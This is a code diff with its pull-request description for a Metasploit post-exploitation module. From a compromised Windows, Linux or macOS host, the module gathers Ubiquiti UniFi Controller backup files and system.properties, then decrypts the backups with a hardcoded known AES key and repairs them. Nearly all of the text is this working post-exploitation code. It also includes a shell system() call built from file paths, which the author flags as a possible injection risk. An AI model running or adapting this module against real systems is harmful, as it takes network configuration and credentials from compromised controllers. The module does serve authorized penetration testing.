+    aes.key = 'bcyangkmluohmars' # https://github.com/zhangyoufu/unifi-backup-decrypt/blob/master/Extract.java#L17
+    aes.padding = 0
+    aes.decrypt
+    aes.iv = 'ubntenterpriseap'
+    aes.update(contents)
+  end
+
+  def repair(fname)
+    zip_exe = Msf::Util::Helper.which('zip')
+    if zip_exe.nil?
+      return nil
+    end
+    print_status('Attempting to repair zip file (this is normal)')
+    temp_file = Rex::Quickfile.new("fixed_zip")
+    system("yes | #{zip_exe} -FF #{fname} --out #{temp_file.path}.zip > /dev/null")
+    if $? == 0
+      return File.open("#{temp_file.path}.zip", 'rb') { |f| f.read}
+    else
+      print_error('Error fixing zip.  Attempt manually.')
+      nil
+    end
+  end
+
+  def find_save_files(d)
+    case session.platform
+    when 'windows'
+      files = session.fs.dir.foreach(d)
+    when 'linux'
+      files = cmd_exec("ls #{d}").split(/\r\n|\r|\n/)
+    end
+
+    files.each do |file|
+      full = "#{d}/#{file}"
+      if directory?(full) && !['.', '..'].include?(file)
+        find_save_files(full)
+        next
+      end
+
+      if not file.end_with? ".unf"
+        next
+      end
+
+      f = read_file(full)
+      loot_path = store_loot('ubiquiti.unifi.backup', 'application/zip', session,
+                             f, file, 'Ubiquiti Unifi Controller Encrypted Backup Zip')
+      print_good("File #{full} saved to #{loot_path}")
+      decrypted_data = decrypt(f)
+      if decrypted_data.nil? || decrypted_data.empty?
+        print_error("Unable to decrypt #{loot_path}")
+        next
+      end
+      loot_path = store_loot('ubiquiti.unifi.backup_decrypted', 'application/zip', session,
+                             decrypted_data, "#{file}.broken.zip", 'Ubiquiti Unifi Controller Decrypted Broken Backup Zip')
+      print_good("File #{file} DECRYPTED and saved to #{loot_path}.  File needs to be repair via `zip -FF`")
+      # ruby zip can't repair, we can try on command line but its not likely to succeed on all platforms
+      # tested on kali
+      repaired = repair(loot_path)
+      if repaired.nil?
+        print_bad("Repair failed on #{loot_path}")
+        return
+      end
+      loot_path = store_loot('ubiquiti.unifi.backup_decrypted_repaired', 'application/zip', session,
+                             repaired, "#{file}.zip", 'Ubiquiti Unifi Controller Backup Zip')
+      print_good("File #{full} DECRYPTED and REPAIRED and saved to #{loot_path}.")
+    end
+  end
+
+  def run
+    case session.platform
+    when 'windows'
+      backup_locations = []
+      sprop_locations = []
+      grab_user_profiles().each do |user|
+        backup_locations.append("#{user['ProfileDir']}\\Ubiquiti Unifi\\data\\backup")
+        sprop_locations.append("#{user['ProfileDir']}\\Ubiquiti UniFi\\data\\system.properties")
+      end
+    when 'linux'
+      # https://help.ubnt.com/hc/en-us/articles/226218448-UniFi-How-to-Configure-Auto-Backup
+      backup_locations = [
+        '/data/autobackup', #Cloud key
+        '/var/lib/unifi/backup' #software install linux
+      ]
+
+      sprop_locations = ['/var/lib/unifi/system.properties'] #default location on 5.10.19 on ubuntu 18.04
+    end
+
+    # read system.properties
+    if datastore['SYSTEMFILE']
+      sprop = datastore['SYSTEMFILE']
+      vprint_status("Utilizing custom system.properties file location: #{datastore['SYSTEMFILE']}")
+    end
+
+    # https://help.ubnt.com/hc/en-us/articles/205202580-UniFi-system-properties-File-Explanation
+    sprop_locations.each do |sprop|
+      if exists?(sprop)
+        begin
+          data = read_file(sprop)
+          loot_path = store_loot('ubiquiti.system.properties', 'text/plain', session, data, sprop)
+          vprint_status("File #{sprop} saved to #{loot_path}")
+          print_good("Read UniFi Controller file #{sprop}")
+        rescue Rex::Post::Meterpreter::RequestError => e
+          print_error("Failed to read #{sprop}")
+          data = ''
+        end
+        data.each_line do |line|
+          unless line.chomp.empty? || line =~ /^#/
+            if /^autobackup\.dir\s*=\s*(?<d>.+)$/ =~ line
+              backup_locations.append(d.strip)
+              vprint_status("Custom autobackup directory identified: #{d.strip}")
+            end
+          end
+        end
+      end
+    end
+
+    backup_locations.each do |bl|
+      if not directory?(bl)
+        vprint_error("Directory doesn't exist: #{bl}")
+        next
+      end
+
+      vprint_good("Found backup folder: #{bl}")
+      find_save_files(bl)
+    end
+  end
+end

--- a/modules/post/multi/gather/ubiquiti_unifi_backup.rb
+++ b/modules/post/multi/gather/ubiquiti_unifi_backup.rb
@@ -134,7 +134,7 @@ class MetasploitModule < Msf::Post
       get_users.each do |user|
         backup_locations << "/Users/#{user}/Library/Application Support/UniFi/data/backup"
         sprop_locations  << "/Users/#{user}/Library/Application Support/Unifi/data/system.properties"
-      end      
+      end
     end
 
     # read system.properties


### PR DESCRIPTION
Post module to run against Ubiquiti Unifi Controllers to download any backup or autobackup files.

These files are.... annoying.  They have a .unf extension but are AES encrypted zip files.  Luckily, its a known key so we decrypt it.  The files then need to be repaired, `zip` has `-FF` to do this (and it works), however the ruby `zip` gems dont have this.  So if `zip` is available on the system (aka nix and maybe osx), we repair the file as well.  If a repair doesn't happen, 7zip may work, but haven't tried.

See docs for install instructions, and verification steps.

@bcoles there is a `system` call in here, the module provides all input, can you think of an RCE possible on this?  I thought maybe if your target was something with ticks in it maybe, but also couldn't think of a better way to do the call.  Open to help and suggestions!